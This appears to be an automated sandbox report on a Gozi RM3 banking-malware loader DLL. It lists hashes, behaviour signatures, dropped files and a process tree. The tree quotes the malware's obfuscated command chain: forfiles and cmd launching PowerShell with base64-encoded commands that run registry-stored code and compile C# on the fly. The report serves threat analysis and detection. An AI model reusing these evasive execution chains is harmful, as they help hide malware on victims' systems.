Analysis

  • max time kernel
    153s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-20220331-en
  • submitted
    07-04-2022 14:56

General

  • Target

    crypted_loader_dll_64Donat_5.dll

  • Size

    151KB

  • MD5

    55ab2f304f8c2da30aeee7713a95064d

  • SHA1

    aae939cf3995905399e427097fc90c5b62f3d4c3

  • SHA256

    41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547

  • SHA512

    08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3

Score
10/10

Malware Config

Extracted

Family

gozi_rm3

Attributes
  • build

    300994

rsa_pubkey.base64
rsa_pubkey.base64

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Drops file in System32 directory 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 44 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1268
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\crypted_loader_dll_64Donat_5.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1212
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\crypted_loader_dll_64Donat_5.dll
          3⤵
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1404
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1028
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1116
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:912
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVwBlAGIAZgBhAGwAcwBlACcAKQAuAEMA
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1152
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQAnAA==
                6⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:568
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGQAZgBvAG0AaABlAGwAcwBvAGgAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGYAbwBtAGgAZQBsAHMAbwBoACkAJwA=
                6⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1676
              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a44bx9d3.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1604
                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF8C.tmp"
                  7⤵
                    PID:1080
                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s75uphsa.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:832
                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC10E3.tmp"
                    7⤵
                      PID:1248
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1868
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1868 CREDAT:275457 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1580
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1868 CREDAT:799749 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:960

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

          Filesize

          717B

          MD5

          54e9306f95f32e50ccd58af19753d929

          SHA1

          eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

          SHA256

          45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

          SHA512

          8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

          Filesize

          192B

          MD5

          ae8b8246c65544f8b8f79a3f07992194

          SHA1

          83411e3c7757d4656938505b95ca095f4c912e73

          SHA256

          2a8f2b0438169a32487c491166bad3ac20d6e811103e198faa8dc86aedc548f8

          SHA512

          78b14de7410df616b66fab79c0febca21bc3fdb3ecad33e48cd3acb23eb15b43704070d8184a93d21c9c516e2e3fdf7855c641007536978a189a86819fadee2d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          5791465dcc8ba4e561e966e3c1b4baff

          SHA1

          a8dd0aa067f92aa4027a5de60faad344109842f4

          SHA256

          2b87c31deff893df5e02da4860373958e5d7d965ebb9be003dea2e03eb9f15ce

          SHA512

          8cf0bddba0f6d9992bf2b9aa9486ee7c277cc1725e12f5c7a79a81ffb13e8f970bc723f77b69e92d7bfda5bf3d389f19a273f20eca9413cdd44a06b4a104bc61

        • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\b1rou5u\imagestore.dat

          Filesize

          4KB

          MD5

          977a22ee8fb6d4c9c9845aa3c6cedda6

          SHA1

          902e6ccbe783c3bf6d8542576b2bfb2867b9e436

          SHA256

          78ed54873b45a2280fa5c13d0f25c3d0b35758accdab78a42f664cffcf4fccbd

          SHA512

          d01993878379c714f7f3dc94ce65c8e002c59d886a87baa4a61d93c143a1bb6fdd914fda5808490009acc9e9a66da467ba75af36d159024f2ef9cfd37c18fa3f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZR09IT6C\favicon[1].ico

          Filesize

          318B

          MD5

          a976d227e5d1dcf62f5f7e623211dd1b

          SHA1

          a2a9dc1abdd3d888484678663928cb024c359ee6

          SHA256

          66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271

          SHA512

          6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

        • C:\Users\Admin\AppData\Local\Temp\RES10E4.tmp

          Filesize

          1KB

          MD5

          5ea9e158127630f156391104592f6c08

          SHA1

          469a5fab603463dab8afa395e3bff56a3653d54e

          SHA256

          cb301afe2a8202decbb1d1fee5eb9bb89ab6412273b793be177d4b84efa4ce3b

          SHA512

          2a684c9630fd73c0a0cf365c5fccef43c5be1307a7622d26ac991d292415f670e3043158064e276bc3ef5d1193564b042f859e2f8ca38335563065cec98d84e4

        • C:\Users\Admin\AppData\Local\Temp\RESF8D.tmp

          Filesize

          1KB

          MD5

          e6f5c40afd932562e7d632639fff3180

          SHA1

          5244f2890504f4e127391cced43b11ec9e3b7857

          SHA256

          90d14c841062bb3cc9bd16861af002bc984a3d31562f1af441b602872a2fc4d4

          SHA512

          2ec47ca88650ea4de89164dcda7156ca1b7144ec5abaed2290035d73e20d0c168181022940a219cd998ba695af3e804662b4e82589e2625d456a0fed589735ef

        • C:\Users\Admin\AppData\Local\Temp\a44bx9d3.dll

          Filesize

          3KB

          MD5

          3a94e868593c1e3d0f884d841acacadb

          SHA1

          39fab8226ca049c9d40663f6d32fd9b926ae5d31

          SHA256

          1655742e661999601fe589fecd6565c2a8197dc2a28e64572b636c824062cbb0

          SHA512

          b231b30be712df25fbf30b3370951b196d706e93fac12b75b5df857def0ebf5d44628198ac88932c489f419951593c03c49ec395257dc5d26584fafbd1631e28

        • C:\Users\Admin\AppData\Local\Temp\a44bx9d3.pdb

          Filesize

          7KB

          MD5

          1c942de7fb257dbc5c17afd78e6422c7

          SHA1

          52a8312f71d78a2149a74d25bab51088cdcb07a1

          SHA256

          4d95e7a382f3a530d0ba3f5808e2b5540e22205b97c6619837f7518faea2f241

          SHA512

          659953d0d6c43e8d7cb36ac7cb3b793d018f64712a120e3f291f52706c5fb3ee7e1097395aeffade64cfc0d3b9d1b93552b8b492c174db8912925edb86dc3f7b

        • C:\Users\Admin\AppData\Local\Temp\s75uphsa.dll

          Filesize

          3KB

          MD5

          5fe31466bc2252c2b2d499757bea6819

          SHA1

          b74c666c89ac4a58370620749b1d33464f7700d3

          SHA256

          3ea3c98bf5354212e7a8bfaf4b11d74a0e9f9b65283cb3b08ec921c37252a20c

          SHA512

          ca1b4a40fda614ccad984609c2eeb36266cdf12ade1a96ba20a72c29aaa875401b49594329f08f0b5f71e3a468a3ff904b2527e012d7ee56f850d79c6a13deaf

        • C:\Users\Admin\AppData\Local\Temp\s75uphsa.pdb

          Filesize

          7KB

          MD5

          94b39192ebec0a4ba9fd206f3b02e1da

          SHA1

          832e20d346407dd09edb97e51cd8c18a61e1f7d3

          SHA256

          1a4121269fa5f3a52ad9d7b8f50abf7232ea79adfc98d96acfe008af13b8e6ca

          SHA512

          9cf75708bd379ce5ffc45eec21d8e4617541fff7789f87747d16746974dea1fd4562701aee69db165752f17b2a62a66830ec8a74a1757c0d5f003958b7d7277e

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          1d3b4f7376f95d37637bee32dd5f9066

          SHA1

          019fc3f43574836f0f446c52838b35856928ed8e

          SHA256

          23af1a9a541b0667742b676a842f70110955551ba67a1d07e21907c53b871b81

          SHA512

          0cbc1ace595f0266a48b6d7a2afea74690adcb00e3b449e9e9b7c1ea754e6a0e9077909ef4e7585e8688184429ab5d521c14da7a6ce35814f7858e5663b78b71

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          1d3b4f7376f95d37637bee32dd5f9066

          SHA1

          019fc3f43574836f0f446c52838b35856928ed8e

          SHA256

          23af1a9a541b0667742b676a842f70110955551ba67a1d07e21907c53b871b81

          SHA512

          0cbc1ace595f0266a48b6d7a2afea74690adcb00e3b449e9e9b7c1ea754e6a0e9077909ef4e7585e8688184429ab5d521c14da7a6ce35814f7858e5663b78b71

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC10E3.tmp

          Filesize

          652B

          MD5

          0dbbe84a55537f88e1584cdd72b2d1e1

          SHA1

          a86c35e4529dd413afb8f598cdbbc04a0a6c40db

          SHA256

          e6c88eda71b9c3a9a1203689df47afb6c42f6c2d94841d3dc63514b445b7d427

          SHA512

          6b480b220c06040aa2423998f6851ac039774e73c8848479274bdbb49d4edf357cea597b9448b3cdc4f071ae524e7af6cdf3c74134119bbcc6e0334823506cb1

        • \??\c:\Users\Admin\AppData\Local\Temp\CSCF8C.tmp

          Filesize

          652B

          MD5

          ad143c38f1472b7aa9ed2ec0e4480132

          SHA1

          cf5e07f4054707d7dd31b4c3803897e7a3ae823c

          SHA256

          7b615dc2e4ff71e57ec935ad87e45c3faf37ffefcd38915ff7bc004d3b73a222

          SHA512

          03a1685c265836426060ef7ffda0a099f41a39a637178beead47f3fdc0a23c836ace9ecca22cff56b671f8703573ca61d5b91b5ec99fed5f7f782f17293aeed1

        • \??\c:\Users\Admin\AppData\Local\Temp\a44bx9d3.0.cs

          Filesize

          417B

          MD5

          cdc42ce046de74fa8cb97234640cfcc5

          SHA1

          8a6aa5bda682fbb11bc974d752408593aec799cc

          SHA256

          7fca4a3b3889149b375ce11cd1614298a244c05e3dd5fa343be56986aaa675c5

          SHA512

          c2663ca8817dc7a375c06cfc4adb529ab61b098663a550feba5dabe8b9c6269a5e878419d5198cb463b9c6b4d5acb504587ffd5721eab568068a7e9d45d55d13

        • \??\c:\Users\Admin\AppData\Local\Temp\a44bx9d3.cmdline

          Filesize

          309B

          MD5

          5cd9ef96fb17f20b93c695314e77818e

          SHA1

          b28b68952701212957dc925d37d1baa2ca8ebe4a

          SHA256

          4fa6e0a4e858a0b57b47fdd8ad4e4702876883050ec067ea13516fdc8991a6c4

          SHA512

          d044400cd59359a16aa6e95b466230b4168d85bb445eea7cc2530b06566187a3cd4d911c859440a8b76959bd279a42ab2950f5c52628401ba1b95a4fa53d3446

        • \??\c:\Users\Admin\AppData\Local\Temp\s75uphsa.0.cs

          Filesize

          416B

          MD5

          e991aa9d35bfffc8f1e0d5dcf4c95ed1

          SHA1

          02d81b5b8cfd7b25d4fa0dab40d6ce6db3129501

          SHA256

          2598df56dcfc916eb9ae7b571c67d2feb92740843e36caccf9df705c03145265

          SHA512

          e0205253f43832674a3ea5dbe376e82fe0a59722ca10bed0184ff8fa298111957437db32aefb725b8c525f62aa8c7bc14922fa665ec9ced0d465d91837da126b

        • \??\c:\Users\Admin\AppData\Local\Temp\s75uphsa.cmdline

          Filesize

          309B

          MD5

          c1fcb10c65fe8c3d5f0eca7d652afa48

          SHA1

          68dbc1536f607d92ae77926a535118aed928ab10

          SHA256

          e26269d0a0ab1b8b9934f94016606abad3559272b95f7d8fd89427f3f02a35cb

          SHA512

          5e498d01b245fa5f8410a440c9818b4756e60d2e1e7f61794ee5669c49ea7de52e2c8e936af916b3a880d2faba1a22cd3bc1d3df56da323720f6e1e5e82d39fc

        • memory/568-86-0x000000001B790000-0x000000001BA8F000-memory.dmp

          Filesize

          3.0MB

        • memory/568-78-0x000007FEF2980000-0x000007FEF34DD000-memory.dmp

          Filesize

          11.4MB

        • memory/568-83-0x00000000025E0000-0x00000000025E2000-memory.dmp

          Filesize

          8KB

        • memory/568-84-0x00000000025E2000-0x00000000025E4000-memory.dmp

          Filesize

          8KB

        • memory/568-85-0x00000000025E4000-0x00000000025E7000-memory.dmp

          Filesize

          12KB

        • memory/568-87-0x00000000025EB000-0x000000000260A000-memory.dmp

          Filesize

          124KB

        • memory/1152-81-0x0000000002864000-0x0000000002867000-memory.dmp

          Filesize

          12KB

        • memory/1152-74-0x000007FEF2980000-0x000007FEF34DD000-memory.dmp

          Filesize

          11.4MB

        • memory/1152-79-0x0000000002860000-0x0000000002862000-memory.dmp

          Filesize

          8KB

        • memory/1152-110-0x000000001B660000-0x000000001B673000-memory.dmp

          Filesize

          76KB

        • memory/1152-80-0x0000000002862000-0x0000000002864000-memory.dmp

          Filesize

          8KB

        • memory/1152-82-0x000000000286B000-0x000000000288A000-memory.dmp

          Filesize

          124KB

        • memory/1212-54-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp

          Filesize

          8KB

        • memory/1404-111-0x0000000000190000-0x0000000000210000-memory.dmp

          Filesize

          512KB

        • memory/1404-64-0x00000000001C0000-0x00000000001C2000-memory.dmp

          Filesize

          8KB

        • memory/1404-62-0x0000000000190000-0x00000000001A0000-memory.dmp

          Filesize

          64KB

        • memory/1404-57-0x0000000010000000-0x000000001000F000-memory.dmp

          Filesize

          60KB

        • memory/1404-56-0x0000000075111000-0x0000000075113000-memory.dmp

          Filesize

          8KB

        • memory/1676-92-0x0000000002494000-0x0000000002497000-memory.dmp

          Filesize

          12KB

        • memory/1676-93-0x000000000249B000-0x00000000024BA000-memory.dmp

          Filesize

          124KB

        • memory/1676-91-0x000007FEF2980000-0x000007FEF34DD000-memory.dmp

          Filesize

          11.4MB